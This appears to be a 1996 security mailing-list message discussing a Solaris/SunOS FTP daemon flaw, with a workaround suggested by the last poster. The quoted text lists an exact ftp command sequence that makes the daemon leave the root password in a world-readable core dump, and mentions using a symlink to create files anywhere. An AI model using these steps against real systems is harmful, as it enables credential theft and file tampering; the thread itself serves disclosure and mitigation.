> > SunOS 5.5:
> >
> > logon via ftp with your regular user/password,
> > ftp> cd /tmp
> > ftp> user root wrongpasswd
> > ftp> quote pasv
> >
> > voila, root password in world readable core dump under /tmp
> >
> I was able to create this core file under Solaris 2.4 as well...and
> if I took the time to create a symbolic link before doing the above
> procedure, I was able to create files anywhere on the system :(
>
I got the same on Solaris 2.4. Being swamped right now I thought I might
create an empty "core" in /tmp and permissions to 000. When doing the ftp
exploit it fills/replaces the core file, but leaves the permissions
intact. ...Maybe this soft patch will hold for a bit?
Received on Oct 16 1996